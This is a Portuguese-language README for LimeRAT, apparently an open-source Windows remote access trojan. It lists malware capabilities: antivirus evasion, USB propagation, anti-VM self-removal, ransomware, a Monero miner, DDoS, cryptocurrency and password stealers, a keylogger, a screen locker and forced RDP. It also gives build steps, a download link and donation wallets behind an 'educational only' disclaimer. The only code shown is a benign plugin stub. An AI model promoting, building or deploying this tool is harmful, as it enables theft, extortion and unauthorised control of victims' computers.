Desatualizado. Arquive-o em vez de apagá-lo
LimeRAT v0.1.9
Ferramenta de Administração Remota para Windows
Descrição
Simples, porém poderosa, RAT para máquinas Windows. Este projeto é simples e fácil de entender. Ele deve dar a você um conhecimento geral sobre malwares dotNET e como eles se comportam.
Principais Recursos
- .NET
- Codificado em Visual Basic .NET, o cliente requer dependência do framework 2.0 ou 4.0, e o servidor é 4.0
- Conexão
- Usando pastebin.com como ip:porta, em vez de DNS noip.com. E também usando múltiplas portas
- Plugin
- Usando sistema de plugin para diminuir o tamanho do stub e reduzir a detecção de AV
- Criptografia
- A comunicação entre servidor e cliente é criptografada com AES
- Propagação
- Infectando todos os arquivos e pastas em unidades USB
- Bypass
- Baixa detecção de AV e método de inicialização não detectado
- Leve
- O tamanho do payload é de cerca de 25 KB
- Anti Máquinas Virtuais
- Se desinstala se a máquina for virtual para evitar varreduras ou análises
- Ransomware
- Criptografa arquivos em todos os HHDs e USBs com a extensão .Lime
- Minerador XMR
- Minerador de CPU Monero de alta performance com otimizações de usuário ocioso\ativo
- DDoS
- Cria um poderoso ataque DDoS para tornar um serviço online indisponível
- Stealer de Criptomoedas
- Rouba dados confidenciais de criptomoedas
- Bloqueador de Tela
- Impede o usuário de acessar a interface gráfica do Windows
- E mais
- Tarefa automática ao conectar
- Força a ativação do RDP do Windows
- Persistência
- Gerenciador de arquivos
- Stealer de senhas
- Área de trabalho remota
- Coletor de Bitcoin
- Downloader
- Keylogger
Pré-requisitos
Para abrir o projeto, você precisa de:
- Visual Studio 2017
- Este repositório
Prévia
Projeto
Ransomware
Processo Crítico
Exemplo de Plugin
VB.NET
'Easy to create a DLL plugin
Public Class Main
'Simple Msgbox
Public Shared Sub CN(ByVal H As String, ByVal P As Integer, ByVal K As String, ByVal SP As String, ByVal PW As String, ByVal FP As String, ByVal HW As String, ByVal BT As String, ByVal PB As String)
Msgbox("Hello Client!")
Send("MSG" + SPL + "Hello Server!")
'Client will send msg back to server, MSG will be showen in [LOG] Tab
End Sub
End Class
C#
public class Main
{
// Simple Msgbox
public static void CN(string H, int P, string K, string SP, string PW, string FP, string HW, string BT, string PB)
{
Msgbox("Hello Client!");
Send("MSG" + SPL + "Hello Server!");
// Client will send msg back to server, MSG will be showen in [LOG] Tab
}
}
Testes
- Abra "LimeRAT.sln"
- Defina o compilador para o modo "Debug"
- No Gerenciador de Soluções, clique com o botão direito em "Solution LimeRAT Project" e pressione "Rebuild Solution"
- Pressione o botão Executar. Esteja ciente de que tanto o cliente quanto o servidor são localhost
Compilação
- Abra "LimeRAT.sln"
- Defina o compilador para o modo "Release"
- No Gerenciador de Soluções, clique com o botão direito em "Solution LimeRAT Project" e pressione "Rebuild Solution"
- Tudo estará em "\Project_EXE\Release"
- Converta stub.exe para stub.il, usando Ildasm
Download do código-fonte e versão compilada
https://github.com/NYAN-x-CAT/Lime-RAT/releases
Este projeto foi testado apenas em laboratório local[LAN]. Não o testei em laboratório externo[WAN].
Servidor testado no Windows 10, cliente testado em máquina virtual Windows 7.
Notas
- Ao usar ransomware, o ponto de restauração não será excluído a menos que o payload esteja sendo executado com privilégios elevados
- O Anti-Kill (BSOD) não funcionará a menos que o payload esteja sendo executado com privilégios elevados
Encontrou um bug? Por favor, reporte-o aqui https://github.com/NYAN-x-CAT/Lime-RAT/issues/new
Autor
Doação
Me pague um café!
- XMR:
49H8Kbf15JFN2diG5evGHA5G49qhgFBuDid86z3MKxTv59dcqySCzFWUL3SgsEk2SufzTziHp3UE5P8BatwuyFuv1bBKQw2
- BTC:
12hTx7u7AqdNr8qo4UFuLwb6XAVjoDioax
Suporte
Aviso Legal
Eu, o criador, não sou responsável por quaisquer ações e/ou danos causados por este software.
Você assume total responsabilidade por suas ações e reconhece que este software foi criado apenas para fins educacionais.
O objetivo principal deste software NÃO é ser usado de forma maliciosa ou em qualquer sistema que você não possua ou não tenha o direito de usar.
Ao usar este software, você concorda automaticamente com o acima exposto.
Licença

Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes